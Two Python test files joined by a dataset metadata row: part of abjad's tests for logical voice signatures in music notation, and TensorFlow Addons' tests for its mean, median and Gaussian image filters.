def test_selectiontools_Parentage_logical_voice_04():
r'''Returns logical voice giving the root and
first voice, staff and score in the parentage of component.
'''
voice = Voice(
r'''
c'8
d'8
<<
\new Voice {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
'''
)
override(voice).note_head.color = 'red'
assert systemtools.TestManager.compare(
voice,
r'''
\new Voice \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\new Voice {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
assert signatures[0] == signatures[1]
assert signatures[0] != signatures[2]
assert signatures[0] != signatures[4]
assert signatures[0] == signatures[6]
assert signatures[2] == signatures[3]
assert signatures[2] != signatures[4]
def test_selectiontools_Parentage_logical_voice_05():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
voice = Voice(
r'''
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
'''
)
override(voice).note_head.color = 'red'
voice.name = 'foo'
assert systemtools.TestManager.compare(
voice,
r'''
\context Voice = "foo" \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
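# Note: the comparisons below are bare expressions without assert, so they
# describe the expected relationships but are not actually checked.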
signatures[0] == signatures[1]
signatures[0] == signatures[2]
signatures[0] != signatures[4]
signatures[0] == signatures[6]
signatures[2] == signatures[0]
signatures[2] == signatures[3]
signatures[2] == signatures[4]
signatures[2] == signatures[6]
signatures[4] != signatures[0]
signatures[4] != signatures[2]
signatures[4] == signatures[5]
signatures[4] == signatures[6]
def test_selectiontools_Parentage_logical_voice_06():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container([
Staff([Voice("c'8 d'8")]),
Staff([Voice("e'8 f'8")]),
])
container[0].name = 'staff1'
container[1].name = 'staff2'
container[0][0].name = 'voicefoo'
container[1][0].name = 'voicefoo'
beam = Beam()
statement = 'attach(beam, container.select_leaves())'
assert pytest.raises(AssertionError, statement)
leaves = container.select_leaves(allow_discontiguous_leaves=True)
beam = Beam()
attach(beam, leaves[:2])
beam = Beam()
attach(beam, leaves[2:])
assert systemtools.TestManager.compare(
container,
r'''
{
\context Staff = "staff1" {
\context Voice = "voicefoo" {
c'8 [
d'8 ]
}
}
\context Staff = "staff2" {
\context Voice = "voicefoo" {
e'8 [
f'8 ]
}
}
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in leaves]
signatures[0] == signatures[1]
signatures[0] != signatures[2]
signatures[2] != signatures[2]
signatures[2] == signatures[3]
def test_selectiontools_Parentage_logical_voice_07():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container(
r'''
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" {
g'8
}
}
a'8
'''
)
override(container[1][1]).note_head.color = 'red'
override(container[2][1]).note_head.color = 'red'
assert systemtools.TestManager.compare(
container,
r'''
{
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
g'8
}
}
a'8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in container.select_leaves(allow_discontiguous_leaves=True)]
signatures[0] != signatures[1]
signatures[0] != signatures[2]
signatures[0] != signatures[3]
signatures[0] != signatures[4]
signatures[0] == signatures[5]
signatures[1] != signatures[0]
signatures[1] != signatures[2]
signatures[1] == signatures[3]
signatures[1] != signatures[4]
signatures[1] != signatures[5]
signatures[2] != signatures[0]
signatures[2] != signatures[1]
signatures[2] != signatures[3]
signatures[2] == signatures[4]
signatures[2] != signatures[5]
def test_selectiontools_Parentage_logical_voice_08():
r'''Unincorporated leaves carry equivalent containment signatures.
'''
note_1 = Note(0, (1, 8))
note_2 = Note(0, (1, 8))
signature_1 = inspect_(note_1).get_parentage().logical_voice
signature_2 = inspect_(note_2).get_parentage().logical_voice
assert signature_1 == signature_2
def test_selectiontools_Parentage_logical_voice_09():
r'''Notes appear in the same logical voice.
'''
t1 = Staff([Voice([Note(0, (1, 8))])])
t1.name = 'staff'
t1[0].name = 'voice'
t2 = Staff([Voice([Note(0, (1, 8))])])
t2.name = 'staff'
t2[0].name = 'voice'
t1_leaf_signature = inspect_(t1.select_leaves()[0]).get_parentage().logical_voice
t2_leaf_signature = inspect_(t2.select_leaves()[0]).get_parentage().logical_voice
assert t1_leaf_signature == t2_leaf_signature
def test_selectiontools_Parentage_logical_voice_10():
r'''Measure and leaves must carry same logical voice signature.
'''
staff = Staff(r'''
{
\time 2/8
c'8
d'8
}
e'8
f'8
''')
assert systemtools.TestManager.compare(
staff,
r'''
\new Staff {
{
\time 2/8
c'8
d'8
}
e'8
f'8
}
'''
)
assert inspect_(staff[0]).get_parentage().logical_voice == \
inspect_(staff[-1]).get_parentage().logical_voice
assert inspect_(staff[0]).get_parentage().logical_voice == \
inspect_(staff[0][0]).get_parentage().logical_voice
assert inspect_(staff[0][0]).get_parentage().logical_voice == \
inspect_(staff[-1]).get_parentage().logical_voice
def test_selectiontools_Parentage_logical_voice_11():
r'''Leaves inside different staves have different logical voice
signatures, even when the staves have the same name.
'''
container = Container(2 * Staff("c'8 c'8"))
container[0].name = container[1].name = 'staff'
assert systemtools.TestManager.compare(
container,
r'''
{
\context Staff = "staff" {
c'8
c'8
}
\context Staff = "staff" {
c'8
c'8
}
}
'''
)
leaves = container.select_leaves(allow_discontiguous_leaves=True)
assert inspect_(leaves[0]).get_parentage().logical_voice == \
inspect_(leaves[1]).get_parentage().logical_voice
assert inspect_(leaves[0]).get_parentage().logical_voice != \
inspect_(leaves[2]).get_parentage().logical_voice
assert inspect_(leaves[2]).get_parentage().logical_voice == \
inspect_(leaves[3]).get_parentage().logical_voice
assert inspect_(leaves[2]).get_parentage().logical_voice != \
inspect_(leaves[0]).get_parentage().logical_voice
| mscuthbert/abjad | abjad/tools/selectiontools/test/test_selectiontools_Parentage_logical_voice.py | Python | gpl-3.0 | 10,702 | 0.000748 |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import pytest
import numpy as np
import tensorflow as tf
from tensorflow_addons.image import mean_filter2d
from tensorflow_addons.image import median_filter2d
from tensorflow_addons.image import gaussian_filter2d
from tensorflow_addons.utils import test_utils
from scipy.ndimage.filters import gaussian_filter
_dtypes_to_test = {
tf.dtypes.uint8,
tf.dtypes.int32,
tf.dtypes.float16,
tf.dtypes.float32,
tf.dtypes.float64,
}
_image_shapes_to_test = [
(3, 3, 1),
(3, 3, 3),
(1, 3, 3, 1),
(1, 3, 3, 3),
(2, 3, 3, 1),
(2, 3, 3, 3),
]
def tile_image(plane, image_shape):
"""Tile a 2-D image `plane` into 3-D or 4-D as per `image_shape`."""
assert 3 <= len(image_shape) <= 4
plane = tf.convert_to_tensor(plane)
plane = tf.expand_dims(plane, -1)
channels = image_shape[-1]
image = tf.tile(plane, (1, 1, channels))
if len(image_shape) == 4:
batch_size = image_shape[0]
image = tf.expand_dims(image, 0)
image = tf.tile(image, (batch_size, 1, 1, 1))
return image
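# Build a tiled test image of the requested shape and dtype, apply the
# given filter function, and return the filtered result.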
def setup_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, dtype
):
assert 3 <= len(image_shape) <= 4
height, width = image_shape[-3], image_shape[-2]
plane = tf.constant(
[x for x in range(1, height * width + 1)], shape=(height, width), dtype=dtype
)
image = tile_image(plane, image_shape=image_shape)
result = filter2d_fn(
image,
filter_shape=filter_shape,
padding=padding,
constant_values=constant_values,
)
return result
def verify_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, expected_plane
):
expected_output = tile_image(expected_plane, image_shape)
for dtype in _dtypes_to_test:
result = setup_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, dtype
)
np.testing.assert_allclose(
result.numpy(),
tf.dtypes.cast(expected_output, dtype).numpy(),
rtol=1e-02,
atol=1e-02,
)
def setUp(self):
self._filter2d_fn = mean_filter2d
super().setUp()
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_mean(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
mean_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_mean(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
mean_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_mean():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, padding="TEST")
def test_none_channels_mean():
# 3-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(shape=(1, 3, 3, 3)))
@pytest.mark.parametrize("shape", [(3, 3), (3, 3, 3), (1, 3, 3, 3)])
def test_unknown_shape_mean(shape):
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(shape=None, dtype=tf.dtypes.float32),
padding="CONSTANT",
constant_values=1.0,
)
image = tf.ones(shape=shape)
np.testing.assert_equal(image.numpy(), fn(image).numpy())
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[3.6666667, 4.0, 4.3333335],
[4.6666665, 5.0, 5.3333335],
[5.6666665, 6.0, 6.3333335],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_4x4_filter_mean(image_shape):
expected_plane = tf.constant(
[
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(4, 4),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_constant_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[1.3333334, 2.3333333, 1.7777778],
[3.0, 5.0, 3.6666667],
[2.6666667, 4.3333335, 3.1111112],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=0,
expected_plane=expected_plane,
)
expected_plane = tf.constant(
[
[1.8888888, 2.6666667, 2.3333333],
[3.3333333, 5.0, 4.0],
[3.2222223, 4.6666665, 3.6666667],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=1,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_symmetric_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[2.3333333, 3.0, 3.6666667],
[4.3333335, 5.0, 5.6666665],
[6.3333335, 7.0, 7.6666665],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="SYMMETRIC",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_median(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
median_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_median(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
mean_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_median():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, padding="TEST")
def test_none_channels_median():
# 3-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(shape=(1, 3, 3, 3)))
@pytest.mark.parametrize("shape", [(3, 3), (3, 3, 3), (1, 3, 3, 3)])
def test_unknown_shape_median(shape):
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(shape=None, dtype=tf.dtypes.float32),
padding="CONSTANT",
constant_values=1.0,
)
image = tf.ones(shape=shape)
np.testing.assert_equal(image.numpy(), fn(image).numpy())
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_3x3_filter_median(image_shape):
expected_plane = tf.constant([[4, 4, 5], [5, 5, 5], [5, 6, 6]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_4x4_filter_median(image_shape):
expected_plane = tf.constant([[5, 5, 5], [5, 5, 5], [5, 5, 5]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(4, 4),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_constant_padding_with_3x3_filter(image_shape):
expected_plane = tf.constant([[0, 2, 0], [2, 5, 3], [0, 5, 0]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=0,
expected_plane=expected_plane,
)
expected_plane = tf.constant([[1, 2, 1], [2, 5, 3], [1, 5, 1]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=1,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_symmetric_padding_with_3x3_filter_median(image_shape):
expected_plane = tf.constant([[2, 3, 3], [4, 5, 6], [7, 7, 8]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="SYMMETRIC",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.mark.parametrize("shape", [[10, 10], [10, 10, 3], [2, 10, 10, 3]])
@pytest.mark.parametrize("padding", ["SYMMETRIC", "CONSTANT", "REFLECT"])
@pytest.mark.parametrize("dtype", [np.float32, np.float64])
def test_gaussian_filter2d(shape, padding, dtype):
modes = {
"SYMMETRIC": "reflect",
"CONSTANT": "constant",
"REFLECT": "mirror",
}
image = np.arange(np.prod(shape)).reshape(*shape).astype(dtype)
ndims = len(shape)
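# scipy's gaussian_filter smooths every axis, so the per-axis sigma list
# zeroes out the batch/channel axes to match gaussian_filter2d, which only
# filters the two spatial axes.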
sigma = [1.0, 1.0]
if ndims == 3:
sigma = [1.0, 1.0, 0.0]
elif ndims == 4:
sigma = [0.0, 1.0, 1.0, 0.0]
test_utils.assert_allclose_according_to_type(
gaussian_filter2d(image, 9, 1, padding=padding).numpy(),
gaussian_filter(image, sigma, mode=modes[padding]),
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_gaussian_filter2d_different_sigma():
image = np.arange(40 * 40).reshape(40, 40).astype(np.float32)
sigma = [1.0, 2.0]
test_utils.assert_allclose_according_to_type(
gaussian_filter2d(image, [9, 17], sigma).numpy(),
gaussian_filter(image, sigma, mode="mirror"),
)
| tensorflow/addons | tensorflow_addons/image/tests/filters_test.py | Python | apache-2.0 | 11,712 | 0.000256 |